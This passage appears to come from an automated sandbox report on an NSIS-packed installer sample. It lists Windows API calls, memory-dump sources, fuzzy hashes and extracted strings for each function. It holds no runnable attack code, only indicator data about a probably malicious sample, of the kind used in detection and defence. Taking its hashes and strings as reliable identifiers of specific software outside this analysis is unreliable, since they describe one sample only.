                    • IsWindowEnabled.USER32(00000000), ref: 0040500A
                    • GetDlgItem.USER32(?,00000001), ref: 004050B9
                    • GetDlgItem.USER32(?,00000002), ref: 004050C3
                    • SetClassLongW.USER32(?,000000F2,?), ref: 004050DD
                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040512E
                    • GetDlgItem.USER32(?,00000003), ref: 004051D4
                    • ShowWindow.USER32(00000000,?), ref: 004051F6
                    • EnableWindow.USER32(?,?), ref: 00405208
                    • EnableWindow.USER32(?,?), ref: 00405223
                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405239
                    • EnableMenuItem.USER32(00000000), ref: 00405240
                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00405258
                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040526B
                    • lstrlenW.KERNEL32(0044FD98,?,0044FD98,004732A0), ref: 00405294
                    • SetWindowTextW.USER32(?,0044FD98), ref: 004052A8
                    • ShowWindow.USER32(?,0000000A), ref: 004053DC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                    • String ID:
                    • API String ID: 184305955-0
                    • Opcode ID: 7aaa3711757a90e2e8d2d5b12379ccc9e45fddc9e642e06a127254d179e313fb
                    • Instruction ID: 48c820c9c586f8d8a765c04f05b8e06de5329faa08805170889eeb6d15e0b63f
                    • Opcode Fuzzy Hash: 7aaa3711757a90e2e8d2d5b12379ccc9e45fddc9e642e06a127254d179e313fb
                    • Instruction Fuzzy Hash: 1DC19F71500A04EBDB206F61EE89E2B3AA8FB45746F00053EF645B11F1CB799881EF5E
                    APIs
                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00403CD3
                    • GetDlgItem.USER32(?,000003E8), ref: 00403CE7
                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403D04
                    • GetSysColor.USER32(?), ref: 00403D15
                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403D23
                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403D31
                    • lstrlenW.KERNEL32(?), ref: 00403D3C
                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403D49
                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00403D58
                      • Part of subcall function 00403B31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00403C8A,?), ref: 00403B48
                      • Part of subcall function 00403B31: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00403C8A,?), ref: 00403B57
                      • Part of subcall function 00403B31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00403C8A,?), ref: 00403B6B
                    • GetDlgItem.USER32(?,0000040A), ref: 00403DB2
                    • SendMessageW.USER32(00000000), ref: 00403DB9
                    • GetDlgItem.USER32(?,000003E8), ref: 00403DE4
                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403E27
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00403E35
                    • SetCursor.USER32(00000000), ref: 00403E38
                    • ShellExecuteW.SHELL32(0000070B,open,0046B220,00000000,00000000,00000001), ref: 00403E4D
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00403E59
                    • SetCursor.USER32(00000000), ref: 00403E5C
                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00403E8B
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00403E9D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                    • String ID: LimePhillips$N$open
                    • API String ID: 3928313111-3321108494
                    • Opcode ID: eeec9a5106f0c5fb6c06cb270565f78b24ee1f1d5bc0a3e508a16aae0c4c8822
                    • Instruction ID: ed57efd37533f930562fe34da2b72c8113efd27b5b8a5cb1164b605c320215f3
                    • Opcode Fuzzy Hash: eeec9a5106f0c5fb6c06cb270565f78b24ee1f1d5bc0a3e508a16aae0c4c8822
                    • Instruction Fuzzy Hash: A87181B1900609BFDB109F24DD89A6A7F7CFB04306F00813AF605B62E1C7789A51CF99
                    APIs
                    • lstrcpyW.KERNEL32(00463E20,NUL,?,00000000,?,?,?,0040654E,00000000,00000000,00000001,00406721,?,00000000,000000F1,?), ref: 0040636B
                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,?,?,0040654E,00000000,00000000,00000001,00406721,?,00000000), ref: 0040638A
                    • GetShortPathNameW.KERNEL32(00000000,00463E20,00000400), ref: 00406393
                      • Part of subcall function 00405864: lstrlenA.KERNEL32(00406495,?,00000000,00000000,?,00000000,00406495,00000000,[Rename]), ref: 00405874
                      • Part of subcall function 00405864: lstrlenA.KERNEL32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 004058A6
                    • GetShortPathNameW.KERNEL32(Ne@,00469478,00000400), ref: 004063B4
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00463E20,000000FF,00464620,00000400,00000000,00000000,?,00000000,?,?,?,0040654E,00000000,00000000), ref: 004063DD
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00469478,000000FF,00464C70,00000400,00000000,00000000,?,00000000,?,?,?,0040654E,00000000,00000000), ref: 004063F5
                    • wsprintfA.USER32 ref: 0040640F
                    • GetFileSize.KERNEL32(00000000,00000000,00469478,C0000000,00000004,00469478,?), ref: 00406447
                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406456
                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406472
                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004064A2
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00465070,00000000,-0000000A,004089A0,00000000,[Rename]), ref: 004064F5
                      • Part of subcall function 004058FE: GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
                      • Part of subcall function 004058FE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924
                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406509
                    • GlobalFree.KERNEL32(00000000), ref: 00406510
                    • CloseHandle.KERNEL32(?), ref: 0040651A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                    • String ID: >F$%s=%s$NUL$Ne@$[Rename]$pLF
                    • API String ID: 565278875-2487742289
                    • Opcode ID: b4dbeba100c443a2c99ce08ec389315a9b0dbc3ce33a9389b5f019bb092845f7
                    • Instruction ID: ec96de5c0a89ca25b54bc76a1f58c05e631165e395b03bcecce623a0c26120a0
                    • Opcode Fuzzy Hash: b4dbeba100c443a2c99ce08ec389315a9b0dbc3ce33a9389b5f019bb092845f7
                    • Instruction Fuzzy Hash: C2412A32105209BFC6202B61EE48E2F3E5CDF86758B16453EF546F22D1DE3D98158ABE
                    APIs
                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                    • BeginPaint.USER32(?,?), ref: 00401047
                    • GetClientRect.USER32(?,?), ref: 0040105B
                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                    • DeleteObject.GDI32(?), ref: 004010F6
                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                    • SelectObject.GDI32(00000000,?), ref: 00401149
                    • DrawTextW.USER32(00000000,004732A0,000000FF,00000010,00000820), ref: 0040115F
                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                    • DeleteObject.GDI32(?), ref: 0040116E
                    • EndPaint.USER32(?,?), ref: 00401177
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                    • String ID: F
                    • API String ID: 941294808-1304234792
                    • Opcode ID: 6ff7da4ded68621eb9ecef41b220d021edcb146cdc93fa7e0b1181698ae2407c
                    • Instruction ID: 5d70bd818855421fa823bf0ed1b165e0401977292747d9ede3c4f118d7b178ba
                    • Opcode Fuzzy Hash: 6ff7da4ded68621eb9ecef41b220d021edcb146cdc93fa7e0b1181698ae2407c
                    • Instruction Fuzzy Hash: BB515A71400209AFCF058F95DE459AF7FB9EF44311F04802AF992AA1A0CB38DA55DFA4
                    APIs
                    • GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00423179,771B23A0,00000000), ref: 0040619B
                    • GetSystemDirectoryW.KERNEL32(LimePhillips,00002004), ref: 0040621D
                      • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                      • Part of subcall function 004060CA: SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040626C
                      • Part of subcall function 004060CA: SHGetPathFromIDListW.SHELL32(?,LimePhillips), ref: 0040627A
                      • Part of subcall function 004060CA: CoTaskMemFree.OLE32(?), ref: 00406285
                    • GetWindowsDirectoryW.KERNEL32(LimePhillips,00002004), ref: 00406230
                    • lstrcatW.KERNEL32(LimePhillips,\Microsoft\Internet Explorer\Quick Launch), ref: 004062AA
                    • lstrlenW.KERNEL32(LimePhillips,00447D88,?,00000000,00404AAA,00447D88,00000000,00423179,771B23A0,00000000), ref: 0040630C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrcpynlstrlen
                    • String ID: LimePhillips$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                    • API String ID: 3935908587-3470335876
                    • Opcode ID: d404f1267a91f84120ed82a5726344723f4104790e5192d29b3fdddb81e5045c
                    • Instruction ID: faf527bbbd80b2f6d96589bc921f5814a8c68153425bf04786751db3c9b8505d
                    • Opcode Fuzzy Hash: d404f1267a91f84120ed82a5726344723f4104790e5192d29b3fdddb81e5045c
                    • Instruction Fuzzy Hash: A2711531900215AADF20AF68CC4467E33B4EB55314F12817FE947BA2E1D73D89A2CB9D
                    APIs
                    • GetWindowLongW.USER32(?,000000EB), ref: 0040396C
                    • GetSysColor.USER32(00000000), ref: 00403988
                    • SetTextColor.GDI32(?,00000000), ref: 00403994
                    • SetBkMode.GDI32(?,?), ref: 004039A0
                    • GetSysColor.USER32(?), ref: 004039B3
                    • SetBkColor.GDI32(?,?), ref: 004039C3
                    • DeleteObject.GDI32(?), ref: 004039DD
                    • CreateBrushIndirect.GDI32(?), ref: 004039E7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                    • String ID:
                    • API String ID: 2320649405-0
                    • Opcode ID: 6e8c2a3615f2505a185ac55974dadb6ac4ac18c0c35a8d3832bbfc0dda71d657
                    • Instruction ID: fd505c26376d0b004dab163c32b6598f7c3f39bfa23b8c101552dd0b32be6230
                    • Opcode Fuzzy Hash: 6e8c2a3615f2505a185ac55974dadb6ac4ac18c0c35a8d3832bbfc0dda71d657
                    • Instruction Fuzzy Hash: 931166B15007446BC7219F68DE08B5BBFFCAF05715F05892DF886E22A0D774DA48CB54
                    APIs
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402A83
                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,00000000), ref: 00402AA0
                    • GlobalFree.KERNEL32(?), ref: 00402AD7
                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00402AEB
                    • GlobalFree.KERNEL32(00000000), ref: 00402AF2
                    • CloseHandle.KERNEL32(?), ref: 00402B09
                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402B1C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                    • String ID:
                    • API String ID: 3294113728-0
                    • Opcode ID: 2a415ac0b65e7ed1e85d085157a57941f96e69fc1561960092c6122626d45b92
                    • Instruction ID: 9e4a56611826f2756eb4244239c06745681650eb98283bcdfa384ecb69a0f049
                    • Opcode Fuzzy Hash: 2a415ac0b65e7ed1e85d085157a57941f96e69fc1561960092c6122626d45b92
                    • Instruction Fuzzy Hash: 13219832D00114BBCB216FA5DE49E9F7F79DF49724F10423AF925761E1CB7848119BA8
                    APIs
                    • lstrlenW.KERNEL32(00447D88,00423179,771B23A0,00000000), ref: 00404AAB
                    • lstrlenW.KERNEL32(0040304D,00447D88,00423179,771B23A0,00000000), ref: 00404ABB
                    • lstrcatW.KERNEL32(00447D88,0040304D,0040304D,00447D88,00423179,771B23A0,00000000), ref: 00404ACE
                    • SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E
                      • Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00423179,771B23A0,00000000), ref: 0040619B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                    • String ID:
                    • API String ID: 2740478559-0
                    • Opcode ID: 141fa25f867edaa8b9051ab2f09e4248f19e9da238f05a8cd45e618e6a3e53c0
                    • Instruction ID: 484fc1ca55a69b1daf8ef76b765ed66def062ae06368be70f68da4f473989c37
                    • Opcode Fuzzy Hash: 141fa25f867edaa8b9051ab2f09e4248f19e9da238f05a8cd45e618e6a3e53c0
                    • Instruction Fuzzy Hash: A221B3B1900518BADF119F65DC84E9EBFB9FF84314F10413AFA04B22A0C7788A80DF58
                    APIs
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0040436A
                    • GetMessagePos.USER32 ref: 00404372
                    • ScreenToClient.USER32(?,?), ref: 0040438A
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040439C
                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004043C2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Message$Send$ClientScreen
                    • String ID: f
                    • API String ID: 41195575-1993550816
                    • Opcode ID: 0fd0a508c23a1f4cc7d109850199a12f342c67c69df64cb0c481c89d05409d64
                    • Instruction ID: 785f0416c38af9d8ad27fcbae1db7caa358ffe27c450e4d5cf04d3572e5fe4cd
                    • Opcode Fuzzy Hash: 0fd0a508c23a1f4cc7d109850199a12f342c67c69df64cb0c481c89d05409d64
                    • Instruction Fuzzy Hash: B0017171A4021DBAEB00DBA4DD85FEEBBBCAF55714F10012BFB50B61D0C7B49A418B65
                    APIs
                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD2
                    • MulDiv.KERNEL32(00052A00,00000064,01630000), ref: 00402DFD
                    • wsprintfW.USER32 ref: 00402E0D
                    • SetWindowTextW.USER32(?,?), ref: 00402E1D
                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E2F
                    Strings
                    • verifying installer: %d%%, xrefs: 00402E07
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Text$ItemTimerWindowwsprintf
                    • String ID: verifying installer: %d%%
                    • API String ID: 1451636040-82062127
                    • Opcode ID: a052d906e27c43246bcc9f1aeeeeed0a4803bb8fb5ea3e7766d01d4d8a37771c
                    • Instruction ID: aa47155a64d8ebbb4a0163e37034f34a23c06eccf97bc0b219fefb1598c68ac6
                    • Opcode Fuzzy Hash: a052d906e27c43246bcc9f1aeeeeed0a4803bb8fb5ea3e7766d01d4d8a37771c
                    • Instruction Fuzzy Hash: 25014470640108BBDF109F64DD49FAE3BA9AB04304F004139FA06A51E0DBB989558F58
                    APIs
                    • CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
                    • CharNextW.USER32(?,?,?,00000000), ref: 00405B59
                    • CharNextW.USER32(?,004E00C8,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
                    • CharPrevW.USER32(?,?,004CC0A0,004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1252775681.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1252749132.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252789647.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252803341.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1252887645.0000000000541000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_wWk9NkXYcL.jbxd
                    Similarity
                    • API ID: Char$Next$Prev
                    • String ID: *?|<>/":
                    • API String ID: 589700163-165019052
                    • Opcode ID: b7b5818da4b4a2654bbca5167226ce5d18b2b6f4b0368041995d2741e331b462
                    • Instruction ID: 31febb90154ecf465c6c3fd58460301c566faf6ecd06643fefb4dc305e878468
                    • Opcode Fuzzy Hash: b7b5818da4b4a2654bbca5167226ce5d18b2b6f4b0368041995d2741e331b462
                    • Instruction Fuzzy Hash: B9118E15810A1599CB30BB298840E7BB7F8EE95750750853FED85B32C1E778BC81CABD
                    APIs
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014B9
                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014F5
                    • RegCloseKey.ADVAPI32(?), ref: 004014FE
